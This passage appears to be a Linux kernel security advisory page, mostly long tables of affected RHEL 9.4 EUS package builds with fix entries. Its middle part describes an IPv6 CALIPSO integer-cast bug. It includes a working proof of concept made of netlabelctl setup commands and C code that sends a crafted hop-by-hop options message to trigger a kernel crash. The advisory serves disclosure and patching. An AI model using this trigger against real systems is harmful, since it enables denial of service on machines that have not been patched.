| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
